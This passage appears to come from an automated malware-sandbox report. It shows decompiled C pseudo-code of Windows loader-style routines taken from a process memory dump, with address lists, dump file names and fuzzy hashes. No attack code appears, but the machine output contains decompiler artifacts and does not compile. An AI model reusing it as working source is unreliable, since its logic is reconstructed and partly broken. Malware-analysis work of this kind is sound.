											L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3706e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3708608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03646B90(_t210,  &_v64);
										_t262 =  *0x3708608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0364E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E036597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0365006A(0x3708608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3708608);
												E0365B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3706904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3706e48; // 0x2bbe118
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E0362FFB0(_t198, _t240, 0x3708608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E036500C2(0x3708608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x9
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x036420a0
0x036420a8
0x036420ad
0x036420b3
0x036420b8
0x036420c2
0x036420c7
0x036420cb
0x036420d2
0x03642263
0x03642266
0x03685836
0x03685836
0x00000000
0x0364226c
0x0364226c
0x03642270
0x03642274
0x036420e2
0x036420e2
0x036420e6
0x036420ee
0x036857dc
0x036857de
0x036857ec
0x036857ec
0x036857f1
0x036857f3
0x036857f8
0x00000000
0x036857f8
0x036857e0
0x036857e4
0x036857ea
0x00000000
0x00000000
0x00000000
0x036857ea
0x036420f4
0x036420f4
0x036420f8
0x036420f8
0x036420fc
0x03642100
0x03642106
0x03642201
0x03642206
0x0364220b
0x0364220e
0x036422a9
0x036422ac
0x00000000
0x00000000
0x036422b2
0x036422b5
0x03685801
0x03685806
0x00000000
0x00000000
0x03685810
0x03685815
0x03685818
0x00000000
0x00000000
0x0368581e
0x036422bb
0x036422bb
0x03642218
0x03642218
0x0364221c
0x03642220
0x03642222
0x036422c2
0x036422c4
0x036422dc
0x036422dc
0x036422e1
0x00000000
0x00000000
0x00000000
0x036422e7
0x036422c8
0x036422cd
0x036422d3
0x036422d6
0x03685823
0x03685825
0x03685827
0x00000000
0x00000000
0x0368582d
0x00000000
0x0368582d
0x00000000
0x03642228
0x03642228
0x00000000
0x03642228
0x03642222
0x03642214
0x03642214
0x00000000
0x03642114
0x03642114
0x03642114
0x0364211a
0x0364211c
0x03642348
0x0364234d
0x03685840
0x03685845
0x03685848
0x0368584e
0x0368584e
0x03685848
0x03642353
0x03642355
0x03642388
0x03642388
0x03642368
0x0364236a
0x0364236c
0x0364238f
0x00000000
0x0364236e
0x0364236e
0x0364218e
0x0364218e
0x03642191
0x03642195
0x03685a03
0x03685a06
0x03685a0c
0x03685a0f
0x03685a11
0x03685a13
0x03685a13
0x03685a19
0x03685a1f
0x00000000
0x0364219b
0x0364219b
0x036421a0
0x03642282
0x03642284
0x03642284
0x03642284
0x03642284
0x036421a6
0x036421a9
0x036421ac
0x036421ae
0x036421b3
0x0364228b
0x03642290
0x03642379
0x03642296
0x03642298
0x03642298
0x03642290
0x036421b9
0x036421be
0x036422a2
0x036422a2
0x036421c4
0x036421c8
0x036421cc
0x036421d0
0x036421d4
0x036421de
0x036421e3
0x03685a29
0x03685a2c
0x00000000
0x00000000
0x03685a3b
0x00000000
0x036421e9
0x036421e9
0x036421e9
0x036421ee
0x036421f1
0x03685a45
0x03685a4b
0x03685a52
0x03685a58
0x03685a5d
0x03685a5f
0x03685a71
0x03685a61
0x03685a6a
0x03685a6a
0x03685a76
0x03685a79
0x03685a7f
0x03685a83
0x03685a85
0x03685a87
0x03685a87
0x03685a8c
0x03685a91
0x03685a97
0x03685a9f
0x03685aa0
0x03685aa1
0x03685aa6
0x03685aab
0x03685ab1
0x03685ab3
0x03685ab9
0x03685aca
0x03685ad4
0x03685ad4
0x03685ade
0x03685ade
0x03685aab
0x03685a79
0x03685a52
0x036421f7
0x036421f9
0x036421fe
0x036421fe
0x036421e3
0x03642195
0x0364236c
0x03642122
0x03642122
0x03642124
0x03642231
0x03642236
0x03642236
0x03642238
0x03642238
0x03642240
0x03642242
0x03642244
0x036859fc
0x0364218c
0x0364218c
0x00000000
0x0364218c
0x0364224a
0x0364224f
0x03642256
0x03642304
0x03642309
0x0364230f
0x0364231e
0x0364231e
0x0364231e
0x03642320
0x03642325
0x0364232a
0x0364232c
0x0364233e
0x0364233e
0x00000000
0x0364232c
0x03642311
0x03642317
0x0364231a
0x0364231c
0x03642380
0x03642380
0x03642380
0x03642384
0x00000000
0x00000000
0x03642386
0x00000000
0x0364231c
0x0364225c
0x0364225c
0x00000000
0x0364225c
0x0364212a
0x03642134
0x03642138
0x0364213d
0x03685858
0x03685863
0x03685863
0x03685867
0x0368586a
0x00000000
0x00000000
0x0368586c
0x0368586c
0x03685871
0x03685875
0x03685877
0x03685997
0x0368599c
0x036859a1
0x036859a7
0x036859a7
0x00000000
0x036859a7
0x0368587d
0x00000000
0x0368588b
0x0368588b
0x03685890
0x03685892
0x03685894
0x03685899
0x0368589b
0x036858a0
0x036858a0
0x036858aa
0x036858b2
0x036858b6
0x036858be
0x036858c6
0x036858c9
0x0368590d
0x03685917
0x0368591a
0x0368591c
0x03685920
0x03685928
0x0368592a
0x0368592c
0x0368592e
0x0368592e
0x036858cb
0x036858cd
0x036858d8
0x036858e0
0x036858f4
0x036858fe
0x036858fe
0x0368593a
0x0368593e
0x03685940
0x03685942
0x00000000
0x03685944
0x03685944
0x03685949
0x0368594e
0x0368594e
0x03685953
0x0368595b
0x03685976
0x03685976
0x0368597a
0x0368597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03685981
0x03685981
0x03685981
0x03685983
0x03685988
0x0368598d
0x03685991
0x03685991
0x00000000
0x0368595d
0x0368595d
0x03685963
0x03685965
0x00000000
0x00000000
0x00000000
0x00000000
0x03685967
0x03685967
0x0368596b
0x0368596d
0x00000000
0x00000000
0x0368596f
0x03685971
0x03685971
0x03685974
0x00000000
0x00000000
0x00000000
0x03685974
0x00000000
0x03685967
0x0368595b
0x03685942
0x03685863
0x03642143
0x03642143
0x03642149
0x0364214f
0x036422ec
0x036422f1
0x036422f6
0x00000000
0x036422f6
0x03642159
0x03642173
0x03642173
0x0364217d
0x03642181
0x03642186
0x036859ae
0x036859b2
0x036859b5
0x036859b7
0x036859ba
0x036859cd
0x036859d1
0x036859d5
0x036859d9
0x036859db
0x00000000
0x00000000
0x036859dd
0x036859dd
0x036859e1
0x036859e4
0x036859e7
0x036859ee
0x036859ee
0x036859f3
0x036859f3
0x00000000
0x03642186
0x03642164
0x0364216d
0x00000000
0x00000000
0x00000000
0x0364216d
0x03642106
0x03642266
0x036420d8
0x036420da
0x036420e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec96294046e48daa2a0667abdab86ad586402cd639d2b6c300abbe661f8a8aa
Instruction ID: acc27db90bfdca48527b65475668642dbb9f91c7bb1d6765aa12fc74d165c972
Opcode Fuzzy Hash: eec96294046e48daa2a0667abdab86ad586402cd639d2b6c300abbe661f8a8aa
Instruction Fuzzy Hash: 9CF14830A08345DFDB25DF28C55076BBBE5AF8A314F188A6DFA969B380D734C841CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0362D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0362D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x370d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03626600(0x37052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3707b9c; // 0x0
							_t281 = L03634620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0365F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3707b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x3707b8c; // 0x2bb29e0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x2bb2a90
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E03632280(_t200, 0x37084d8);
									_t277 =  *0x37085f4; // 0x2bb2f50
									_t351 =  *0x37085f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74af0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x2bb2f98
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x2bb2ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x2bb2f98
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x2bb8ee8
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0362FFB0(_t287, _t353, 0x37084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0366CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03626600(0x37052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03627926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x370b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0369E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3708472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x370b218; // 0x6ab0bb6c
														asm("ror edi, cl");
														 *0x370b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03632280(_t250, 0x37084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03653898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0362FFB0(_t293, _t353, 0x37084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E036537F5(_t353, 0);
																}
																E03650413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03649B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E036402D6(_t174);
																}
																L036377F0( *0x3707b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0364C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0362EC7F(_t353);
										L036419B8(_t287, 0, _t353, 0);
										_t200 = E0361F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0365B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x370b2f8; // 0x3c0000
									if((_t206 |  *0x370b2fc) == 0 || ( *0x370b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x370b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E036C6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E036C6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0362E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0362EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03659730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0362E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03628F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03653C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0362d5f2
0x0362d5f5
0x0362d5f5
0x0362d5fd
0x0362d600
0x0362d60a
0x0362d60d
0x0362d617
0x0362d61d
0x0362d627
0x0362d62e
0x0362d911
0x0362d913
0x00000000
0x0362d919
0x0362d919
0x0362d919
0x0362d634
0x0362d634
0x0362d634
0x0362d634
0x0362d640
0x0362d8bf
0x00000000
0x0362d646
0x0362d646
0x0362d64d
0x0362d652
0x0367b2fc
0x0367b2fc
0x0367b302
0x0367b33b
0x0367b341
0x00000000
0x0367b304
0x0367b304
0x0367b319
0x0367b31e
0x0367b324
0x0367b326
0x0367b332
0x0367b347
0x0367b34c
0x0367b351
0x0367b35a
0x00000000
0x0367b328
0x0367b328
0x00000000
0x0367b328
0x0367b326
0x0362d658
0x0362d658
0x0362d65b
0x0362d665
0x00000000
0x0362d66b
0x0362d66b
0x0362d66b
0x0362d66b
0x0362d66d
0x0362d672
0x0362d67a
0x00000000
0x00000000
0x0362d680
0x0362d686
0x0362d8ce
0x0362d8d4
0x0362d8da
0x0362d8dd
0x0362d8dd
0x0362d8e0
0x0362d68c
0x0362d691
0x0362d69d
0x0362d6a2
0x0362d6a7
0x0362d6b0
0x0362d6b0
0x0362d6b5
0x0362d6e0
0x0362d6b7
0x0362d6b7
0x0362d6b9
0x0362d6b9
0x0362d6bb
0x0362d6bd
0x0362d6ce
0x0362d6d0
0x0362d6d2
0x0367b363
0x0367b365
0x00000000
0x0367b36b
0x00000000
0x0367b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0362d6bf
0x0362d6bf
0x0362d6e5
0x0362d6e7
0x0362d6e9
0x0362d6e9
0x0362d6ec
0x0362d6ec
0x0362d6ef
0x0362d6f5
0x0362d6f9
0x0362d6fb
0x0362d6fd
0x0362d701
0x0362d703
0x0362d70a
0x0362d70a
0x0362d70a
0x0362d701
0x0362d70d
0x0362d710
0x0362d710
0x0362d6c1
